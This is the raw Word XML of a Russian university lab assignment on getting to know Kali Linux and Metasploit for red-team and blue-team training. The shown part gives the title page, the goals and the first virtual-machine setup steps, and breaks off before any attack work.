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4F3CF" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23BA35DA" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t xml:space="preserve">МИНИСТЕРСТВО НАУКИ И ВЫСШЕГО ОБРАЗОВАНИЯ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B0A405" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t>РОССИЙСКОЙ ФЕДЕРАЦИИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489113A8" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t xml:space="preserve">ФГБОУ ВО «НАЦИОНАЛЬНЫЙ ИССЛЕДОВАТЕЛЬСКИЙ УНИВЕРСИТЕТ «МЭИ» </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ABE495" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6CE5B8" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E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Факультет/институт</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Инженерно-экономический институт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B5A986" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E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                                      (название факультета/института)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15354B48" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E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Кафедра</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Безопасности и информационных технологий»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3895B537" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E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(название кафедры)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255D153" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:pStyle w:val="Style4"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="13500"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114C4EE6" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377B76B1" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1685336E" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F12AF3F" w14:textId="2F568F76" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/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Лабораторная работа № </w:t>
      </w:r>
      <w:r w:rsidR="00731F49">
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD9C4C6" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5EC54E" w14:textId="3451E2D7" w:rsidR="003E49E7" w:rsidRPr="00F333B4" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дисциплина</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Технологии защиты информационных систем от кибератак</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ознакомление с основным инструментарием злоумышленника на примере Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C43853" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB18CB5" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597003AC" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr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356"/>
        <w:gridCol w:w="351"/>
        <w:gridCol w:w="149"/>
        <w:gridCol w:w="356"/>
        <w:gridCol w:w="629"/>
        <w:gridCol w:w="7"/>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="7"/>
        <w:gridCol w:w="25"/>
      </w:tblGrid>
      <w:tr w:rsidR="003E49E7" w14:paraId="558FDC21" w14:textId="77777777" w:rsidTr="00466A33">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3949CA81" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRDefault="003E49E7" w:rsidP="00466A33">
            <w:pPr>
              <w:spacing w:before="120"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D648EC">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ыполнил студент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  <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EEA9BB7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94" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6964A80D" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRDefault="003E49E7" w:rsidP="00466A33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 w:rsidRPr="00D648EC">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>курса</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E49E7" w:rsidRPr="00260D0B" w14:paraId="1CE888E5" w14:textId="77777777" w:rsidTr="00466A33">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="32" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AFCBCED" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00260D0B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260D0B">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>очно-заочной формы обучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E49E7" w14:paraId="4DD5E3DE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1FD886E5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Группа</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> №: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50BBC087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ИЭ-41-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E49E7" w14:paraId="0B8F9C92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219399E9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844674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3E49E7" w14:paraId="5C4C9135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1F764B02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Проверил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</w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18284786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3E49E7" w14:paraId="4ADB361C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006B7A92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3649DE20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Дратвяк А.В.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E49E7" w14:paraId="73AA6BB6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56B7B639" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC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 xml:space="preserve">дата </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>проверки:</w:t>
            </w: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60D691AE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«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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9FAC69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62A5F6B5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»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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6714C" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRDefault="003E49E7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62" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70652787" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRDefault="003E49E7" w:rsidP="00466A33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2020г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E49E7" w14:paraId="63153194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6BF3271E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Оценка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6A30896E" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRDefault="003E49E7" w:rsidP="00466A33">
            <w:pPr>
              <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F1BD4D4" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601D273E" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRPr="00D648EC" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B970FD5" w14:textId="77777777" w:rsidR="003E49E7" w:rsidRDefault="003E49E7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7E2C5EEC" w14:textId="518B47F8" w:rsidR="00506915" w:rsidRPr="00506915" w:rsidRDefault="00506915" w:rsidP="00506915">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ознакомление с основным инструментарием злоумышленника на примере </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00346506">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07428BE2" w14:textId="66FD1EE6" w:rsidR="00506915" w:rsidRPr="008519DB" w:rsidRDefault="00506915" w:rsidP="00506915">
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Цель</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5379">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E00678">
        <w:t xml:space="preserve">понять </w:t>
      </w:r>
      <w:r w:rsidR="006C1665">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00E00678">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>orkflow</w:t>
      </w:r>
      <w:r w:rsidR="00E00678" w:rsidRPr="00E00678">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E00678">
        <w:t xml:space="preserve">злоумышленника (сотрудника </w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00E00678">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00E00678" w:rsidRPr="00E00678">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00E00678">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eam</w:t>
      </w:r>
      <w:r w:rsidR="00E00678" w:rsidRPr="00E00678">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00E00678">
        <w:t xml:space="preserve">и меры защиты (действия сотрудника </w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00E00678">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lue</w:t>
      </w:r>
      <w:r w:rsidR="00E00678" w:rsidRPr="008519DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00E00678">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eam</w:t>
      </w:r>
      <w:r w:rsidR="00E00678" w:rsidRPr="008519DB">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFD123A" w14:textId="77777777" w:rsidR="00506915" w:rsidRPr="009B5379" w:rsidRDefault="00506915" w:rsidP="00506915">
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Задачи</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5379">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB10C97" w14:textId="4C5C6F50" w:rsidR="00506915" w:rsidRPr="008519DB" w:rsidRDefault="00506915" w:rsidP="00506915">
      <w:r w:rsidRPr="009B5379">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="008519DB">
        <w:t xml:space="preserve">Ознакомление с </w:t>
      </w:r>
      <w:r w:rsidR="008519DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="008519DB" w:rsidRPr="008519DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="008519DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3CEEAC" w14:textId="77777777" w:rsidR="00506915" w:rsidRPr="008519DB" w:rsidRDefault="00506915" w:rsidP="00506915">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="008519DB">
        <w:t xml:space="preserve">Ознакомление с </w:t>
      </w:r>
      <w:r w:rsidR="008519DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="008519DB" w:rsidRPr="008519DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008519DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089D1308" w14:textId="77777777" w:rsidR="00506915" w:rsidRPr="008519DB" w:rsidRDefault="00506915" w:rsidP="00506915">
      <w:r w:rsidRPr="009B5379">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="008519DB">
        <w:t>Разработка защитных мер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657927DA" w14:textId="18AD1218" w:rsidR="00506915" w:rsidRDefault="003E49E7" w:rsidP="00506915">
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Этапы выполнения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> лабораторной работы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FABA4C" w14:textId="6EA1BB62" w:rsidR="00891D97" w:rsidRPr="00866471" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00891D97" w:rsidRPr="00891D97">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Настройка </w:t>
      </w:r>
      <w:r w:rsidR="00891D97" w:rsidRPr="00891D97">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="00891D97" w:rsidRPr="00866471">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00891D97" w:rsidRPr="00891D97">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9E939" w14:textId="092D6198" w:rsidR="00743936" w:rsidRPr="003E49E7" w:rsidRDefault="005F4060" w:rsidP="005F4060">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E49E7">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Скачать</w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4060">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4060">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 64-</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4060">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bit</w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4060">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Live</w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E49E7">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>или найти дистрибутив в папке с Л/р</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0105140A" w14:textId="77777777" w:rsidR="005F4060" w:rsidRPr="003E49E7" w:rsidRDefault="00A72E08" w:rsidP="005F4060">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>kali</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>downloads</w:t>
        </w:r>
        <w:r w:rsidR="005F4060" w:rsidRPr="003E49E7">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3ADE7F80" w14:textId="77777777" w:rsidR="005F4060" w:rsidRDefault="005F4060" w:rsidP="005F4060">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Создать виртуальную машину</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE305D" w14:textId="77777777" w:rsidR="005F4060" w:rsidRDefault="00C31DA3" w:rsidP="005F40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507366" wp14:editId="25A7A5FC">
            <wp:extent cx="5760000" cy="506151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1D13" w14:textId="1664B495" w:rsidR="00B058B0" w:rsidRPr="003E49E7" w:rsidRDefault="003E49E7" w:rsidP="005F4060">
      <w:r w:rsidRPr="003E49E7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Выбрать в качестве носителя дистрибутив </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C25212" w14:textId="77777777" w:rsidR="00B058B0" w:rsidRDefault="00F16836" w:rsidP="003E49E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16DEBE" wp14:editId="3BFE85DC">
            <wp:extent cx="5580000" cy="38745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8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33C" w14:textId="3D1D82C8" w:rsidR="00F16836" w:rsidRPr="003E49E7" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:r w:rsidRPr="003E49E7">
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Установить </w:t>
      </w:r>
      <w:r w:rsidRPr="003E49E7">
        <w:t>набор системных драйверов и приложений</w:t>
      </w:r>
      <w:r>
